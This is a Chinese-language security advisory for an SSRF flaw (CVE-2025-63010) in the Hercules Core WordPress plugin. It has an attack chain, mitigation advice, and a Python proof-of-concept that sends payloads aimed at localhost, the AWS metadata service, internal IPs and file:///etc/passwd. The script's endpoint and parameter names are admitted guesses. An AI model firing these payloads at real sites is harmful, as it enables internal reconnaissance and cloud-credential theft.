CVE-2025-63010 WordPress Hercules Core插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-63010

漏洞类型

服务端请求伪造（SSRF）

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ThemesInflow Hercules Core (WordPress插件)

漏洞概述

CVE-2025-63010是WordPress Hercules Core插件中的一个服务端请求伪造（SSRF）漏洞。该漏洞由Patchstack团队的安全研究员于2025年12月9日发现并披露。Hercules Core是一款广受欢迎的WordPress主题和页面构建器核心插件，提供了丰富的页面构建功能和主题支持。漏洞存在于插件的特定功能模块中，攻击者可以通过构造恶意的URL请求，诱导服务器向攻击者指定的内部或外部资源发起请求。由于服务器端请求会继承服务器的信任关系和网络权限，攻击者可以利用此漏洞探测内网环境、访问受限资源、读取本地文件或云服务元数据等敏感信息。该漏洞的CVSS评分为4.9，属于中等严重程度，但结合其利用的便捷性和对内网安全的潜在威胁，仍需引起高度重视。

技术细节

服务端请求伪造（SSRF）漏洞允许攻击者通过构造特殊请求，诱使服务器代表攻击者向内部或外部资源发起请求。在Hercules Core插件中，漏洞可能存在于处理URL或进行网络请求的功能模块中。攻击者可以通过向插件的特定端点发送包含恶意URL的请求（如file://、http://localhost、http://127.0.0.1或内网IP段），使服务器发起请求并返回响应内容。攻击者可能利用此漏洞进行以下操作：1）端口扫描内网主机，发现运行的服务；2）访问云服务元数据端点（如AWS 169.254.169.254）获取敏感凭证；3）读取本地文件系统内容；4）探测内部Web服务的存在和配置信息。由于该漏洞需要低权限认证才能利用，攻击者可能通过注册普通用户账号或利用已有的低权限账户来实施攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Hercules Core插件版本，确认版本是否在受影响范围内（<=7.4）

STEP 2

步骤2: 账户获取

攻击者通过注册普通用户账户或利用已有的低权限账户获得WordPress网站的访问权限

STEP 3

步骤3: 端点识别

攻击者使用自动化工具或手动分析识别Hercules Core插件中处理URL参数的可利用端点（如AJAX接口）

STEP 4

步骤4: SSRF载荷构造

攻击者构造包含恶意URL的请求载荷，如内网IP、localhost、云元数据服务地址（169.254.169.254）或file://协议

STEP 5

步骤5: 漏洞利用

通过发送构造的请求，诱使服务器向目标地址发起请求，攻击者接收响应内容

STEP 6

步骤6: 内网探测/数据窃取

利用SSRF漏洞进行内网端口扫描、读取敏感文件、访问云服务元数据获取凭证或探测内部服务

STEP 7

步骤7: 权限提升或持久化

利用获取的敏感信息（如云凭证）进一步扩大攻击范围，获取更高权限或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-63010 SSRF PoC (WordPress Hercules Core Plugin)
# Target: WordPress site with Hercules Core plugin <= 7.4
# This PoC demonstrates SSRF vulnerability via crafted URL parameter

import requests
import sys
from urllib.parse import quote

def test_ssrf(target_url, target_ip="127.0.0.1", target_port=22):
    """
    Test for SSRF vulnerability in Hercules Core plugin
    The vulnerable parameter may accept URL input that triggers server-side requests
    """
    
    # Target endpoint (typical WordPress AJAX handler)
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    # SSRF payload - testing internal service detection
    # Attacker can probe internal services by making server request to internal IPs/ports
    ssrf_payloads = [
        # Probe localhost SSH port
        f"http://{target_ip}:{target_port}",
        # Probe cloud metadata service (AWS)
        "http://169.254.169.254/latest/meta-data/",
        # Probe internal web service
        "http://192.168.1.1/admin",
        # File protocol test
        "file:///etc/passwd"
    ]
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    print(f"[*] Testing SSRF on {target_url}")
    print(f"[*] Target IP: {target_ip}, Port: {target_port}")
    
    for payload in ssrf_payloads:
        # Common vulnerable parameter patterns in page builders
        data = {
            "action": "hercules_ajax_action",  # May vary based on plugin version
            "url": payload,  # Vulnerable parameter
            "_ajax_nonce": "dummy"  # May be required
        }
        
        try:
            print(f"\n[*] Testing payload: {payload}")
            response = requests.post(endpoint, data=data, headers=headers, timeout=10, verify=False)
            
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response Length: {len(response.text)}")
            
            if response.status_code == 200 and len(response.text) > 0:
                print(f"[!] Potential SSRF - Server made request to: {payload}")
                print(f"[?] Response preview: {response.text[:200]}...")
                
        except requests.exceptions.Timeout:
            print(f"[-] Request timeout - host may be filtered")
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {str(e)}")
    
    print("\n[*] Note: Actual exploitation requires identifying the correct vulnerable endpoint")
    print("[*] Check plugin source code or use Burp Suite to find SSRF-vulnerable parameters")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_63010_ssrf.py <target_url> [target_ip] [port]")
        print("Example: python cve_2025_63010_ssrf.py http://target.com 192.168.1.1 80")
        sys.exit(1)
    
    target = sys.argv[1]
    ip = sys.argv[2] if len(sys.argv) > 2 else "127.0.0.1"
    port = sys.argv[3] if len(sys.argv) > 3 else 22
    
    test_ssrf(target, ip, port)

影响范围

Hercules Core <= 7.4 (所有版本)

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）限制WordPress普通用户的AJAX功能权限；2）在Web服务器配置中阻止服务器访问内网IP段（10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）；3）禁用服务器对云元数据IP（169.254.169.254）的访问；4）启用服务器的DNS rebinding保护；5）考虑暂时禁用或替换Hercules Core插件，待官方发布安全更新后再恢复使用。